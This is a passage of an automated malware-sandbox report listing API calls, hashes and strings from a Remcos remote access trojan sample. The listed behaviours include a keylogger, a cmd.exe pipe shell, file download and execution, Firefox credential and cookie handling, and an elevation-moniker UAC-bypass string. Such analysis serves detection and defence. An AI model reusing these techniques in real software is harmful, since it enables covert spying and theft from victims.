                                                      • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                      • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                      • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                      • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                      • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                    • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                      • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                      • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                      • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                    • Sleep.KERNEL32(000007D0), ref: 00407976
                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                      • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                    • API String ID: 2918587301-599666313
                                                    • Opcode ID: 6e5f636b2d678d8760414e699c4a29ba3f1ccd129c8a5d01eb096a421d459fa4
                                                    • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                    • Opcode Fuzzy Hash: 6e5f636b2d678d8760414e699c4a29ba3f1ccd129c8a5d01eb096a421d459fa4
                                                    • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                    Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0040508E
                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • __Init_thread_footer.LIBCMT ref: 004050CB
                                                    • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                    • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                    • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                    • CloseHandle.KERNEL32 ref: 004053CD
                                                    • CloseHandle.KERNEL32 ref: 004053D5
                                                    • CloseHandle.KERNEL32 ref: 004053E7
                                                    • CloseHandle.KERNEL32 ref: 004053EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                    • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                    • API String ID: 3815868655-1274243119
                                                    • Opcode ID: 5a9832b8623080509314391e65ed87d579c7873f1e98d06c772b4f9a63e6e4cb
                                                    • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                    • Opcode Fuzzy Hash: 5a9832b8623080509314391e65ed87d579c7873f1e98d06c772b4f9a63e6e4cb
                                                    • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                    Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                    • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                      • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                      • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                      • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                    • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                    • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                    • API String ID: 65172268-860466531
                                                    • Opcode ID: a847706d2ec7f276a03c86ec47a9c399a93715c264525655b265b2837d28efb0
                                                    • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                    • Opcode Fuzzy Hash: a847706d2ec7f276a03c86ec47a9c399a93715c264525655b265b2837d28efb0
                                                    • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                    Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                    • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                    • FindClose.KERNEL32(00000000), ref: 0040B517
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFile$FirstNext
                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                    • API String ID: 1164774033-3681987949
                                                    • Opcode ID: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                    • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                    • Opcode Fuzzy Hash: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                    • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                    Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                    • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                    • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                    • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$Close$File$FirstNext
                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                    • API String ID: 3527384056-432212279
                                                    • Opcode ID: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                    • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                    • Opcode Fuzzy Hash: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                    • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                    Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                    • API String ID: 726551946-3025026198
                                                    • Opcode ID: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                    • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                    • Opcode Fuzzy Hash: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                    • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                    Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32 ref: 004159C7
                                                    • EmptyClipboard.USER32 ref: 004159D5
                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                    • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                    • OpenClipboard.USER32 ref: 00415A61
                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                    • CloseClipboard.USER32 ref: 00415A89
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                    • String ID:
                                                    • API String ID: 3520204547-0
                                                    • Opcode ID: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
                                                    • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                    • Opcode Fuzzy Hash: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
                                                    • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                    Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$1$2$3$4$5$6$7
                                                    • API String ID: 0-3177665633
                                                    • Opcode ID: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
                                                    • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                    • Opcode Fuzzy Hash: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
                                                    • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                    Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00409B3F
                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                    • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                    • GetKeyState.USER32(00000010), ref: 00409B5C
                                                    • GetKeyboardState.USER32(?), ref: 00409B67
                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                    • String ID: X[G
                                                    • API String ID: 1888522110-739899062
                                                    • Opcode ID: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
                                                    • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                    • Opcode Fuzzy Hash: 485c3068d46bbc27ad7f154d56eccfa046da84bd8fffb3f19a1bbf4f86c2e43c
                                                    • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                    Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00406788
                                                    • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object_wcslen
                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                    • API String ID: 240030777-3166923314
                                                    • Opcode ID: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
                                                    • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                    • Opcode Fuzzy Hash: 1499520d982b2c6fe98523ebb7f19fcc58a9361d149757f2a1a63c157573ad6f
                                                    • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                    Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                    • GetLastError.KERNEL32 ref: 00419945
                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                    • String ID:
                                                    • API String ID: 3587775597-0
                                                    • Opcode ID: b4abdf04132cc522fb4eb7e3f7ff7c103e80bca724cea7be45e9bd02ed1f8d82
                                                    • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                    • Opcode Fuzzy Hash: b4abdf04132cc522fb4eb7e3f7ff7c103e80bca724cea7be45e9bd02ed1f8d82
                                                    • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                    Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B539
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B546
                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B580
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B593
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2341273852-0
                                                    • Opcode ID: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                    • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                    • Opcode Fuzzy Hash: 9bd09a2d99c30552ee9248d9d3ead224cb3624160a648d3944adbeb409a266ec
                                                    • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                    Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                    • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                    • GetLastError.KERNEL32 ref: 00409A1B
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                    • TranslateMessage.USER32(?), ref: 00409A7A
                                                    • DispatchMessageA.USER32(?), ref: 00409A85
                                                    Strings
                                                    • Keylogger initialization failure: error , xrefs: 00409A32
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                    • String ID: Keylogger initialization failure: error
                                                    • API String ID: 3219506041-952744263
                                                    • Opcode ID: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                    • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                    • Opcode Fuzzy Hash: 5af43bf104337a9e081dc86c94caad902621d20e35d05cd08c7acc153c36ae5a
                                                    • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                    Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                                    • API String ID: 2127411465-314212984
                                                    • Opcode ID: d5a8415e5f419c8b2433f6cc53c7bb88e326dacb856dc03953fcdd545afaa2c6
                                                    • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                    • Opcode Fuzzy Hash: d5a8415e5f419c8b2433f6cc53c7bb88e326dacb856dc03953fcdd545afaa2c6
                                                    • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                    Function 004513C7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                    • String ID: Zb1Y/
                                                    • API String ID: 745075371-3232713500
                                                    • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
